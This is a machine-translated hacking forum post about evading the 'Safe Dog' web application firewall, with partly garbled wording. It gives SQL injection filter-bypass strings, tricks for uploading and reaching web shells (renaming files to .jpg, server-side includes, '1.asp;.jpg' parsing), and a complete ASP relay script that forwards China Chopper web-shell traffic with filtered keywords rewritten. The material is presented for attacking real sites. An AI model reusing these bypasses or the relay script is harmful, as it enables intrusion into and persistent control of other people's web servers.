Technical Summary of the spam dongle

Is dongle awesome?

What are the main aspects of safe dog:

1. Over-Injection

2. Access blocked by the Trojan Horse

3. One sentence connected by a kitchen knife is intercepted

4.x1.asp).jpg

Nothing else ..

Now, let's talk about it at 1.1:

1. Over-Injection

Method 1: a. asp? Aaa = % 00 & id = SQL statement

Method 2: a. asp? Id = add % l to the security filter in the SQL statement, for example: un % aion sel % aect, fr % aom admin

2. Access blocked by the Trojan Horse

Method 1: Upload a Trojan and access the http://sss.com/dama.asp to access it.

The solution is to change the name of dama.aspto dama.jpg, and then upload a file da. asp in the same directory with the following content: <! -- # Include file = "dama.jpg" --> in this way, access to da. asp will not be blocked.

3. One sentence connected by a kitchen knife is intercepted

Method 1: Do not use a kitchen knife to connect a sentence, or use another sentence to connect the end.

Method 2: connect the kitchen knife to replace the filtered words.

4.x1.asp).jpg

Method 1: 1.asp;.jpg

Method 2: Confidentiality

The specifics are summarized for everyone. The dongle can basically ignore it !!

What else do you want to add can be posted below!

The following script is used to connect a Dongle to a kitchen knife: put the script in a directory that can be executed. asp.

Then access http://www.xx.com/asf.asp? Dz = The webshell address you want

Then, enter the address in the kitchen knife password or the webshell password type you want to use. Also, select the suffix type of the Trojan.

For example, http://www.bkjia.com/asf. asp? Dz = password for http://xxx.com/yijuhua.php

In this way, the kitchen knife is entered.

This script currently supports. php. aspx one-sentence connection. asp may not be tested yet. If anyone has a webshell installed with a Dongle, let me know. I will test again to make all the modifications to this script supported!

<%
'Rao's principle: Grab the kitchen knife to connect to the webshell package and study which keywords are filtered by the dongle to replace those filtered keywords!
JmStr = Replace (Request. Form, "$ _ POST", "$ _ REQUEST ")
JmStr = Replace (JmStr, "-> |", "--> | ")
JmStr = Replace (JmStr, "@ eval (", "@ eval (")
JmStr = Replace (JmStr, "System. Convert. FromBase64String", "System. Convert. FromBase64String ")
JMUrl = request ("dz ")
Response. write request ("dz ")
JmRef = JMUrl
JmCok = ""
'Author: ghost Brother
'Kitchen knife breaks through safe dog connection!
'Www .90sec.org
Response. write PostData (JMUrl, JmStr, JmCok, JmRef)

Function PostData (PostUrl, PostStr, PostCok, PostRef)
Dim Http
Set Http = Server. CreateObject ("msxml2.serverXMLHTTP ")
With Http
. Open "POST", PostUrl, False
. SetRequestHeader "Content-Length", Len (PostStr)
. SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
. SetRequestHeader "Referer", PostRef
'. SetRequestHeader "Cookie", PostCok
. Send PostStr
PostData =. ResponseBody
End
Set Http = Nothing
PostData = bytes2BSTR (PostData)
End Function

Function bytes2BSTR (vIn)
Dim strReturn
Dim I, ThisCharCode, NextCharCode
StrReturn = ""
For I = 1 To LenB (vIn)
ThisCharCode = AscB (MidB (vIn, I, 1 ))
If ThisCharCode <& H80 Then
StrReturn = strReturn & Chr (ThisCharCode)
Else
NextCharCode = AscB (MidB (vIn, I + 1, 1 ))
StrReturn = strReturn & Chr (CLng (ThisCharCode) * & H100 + CInt (NextCharCode ))
I = I + 1
End If
Next
Bytes2BSTR = strReturn
End Function

Function URLEncoding (vstrin)
StrReturn = ""
Dim I
For I = 1 To Len (vstrin)
ThisChr = Mid (vstrin, I, 1)
If Abs (Asc (ThisChr) <& HFF Then
StrReturn = strReturn & ThisChr
Else
InnerCode = Asc (ThisChr)
If InnerCode <0 Then
InnerCode = InnerCode + & H10000
End If
Hight1 = (InnerCode And & HFF00) \ & HFF
Low1 = InnerCode And & HFF
StrReturn = strReturn & "%" & Hex (Hight1) & "%" & Hex (Low1)
End if
Next
StrReturn = Replace (strReturn, chr (32), "% 20") 'to convert spaces. If the website filters spaces, try to Replace % 20 /**/.
StrReturn = Replace (strReturn, chr (43), "% 2B") 'jmdcw add conversion + character
'Strreturn = Replace (strReturn, filter character, "convert to character") 'adds the code to be filtered.
URLEncoding = strReturn
End Function
%>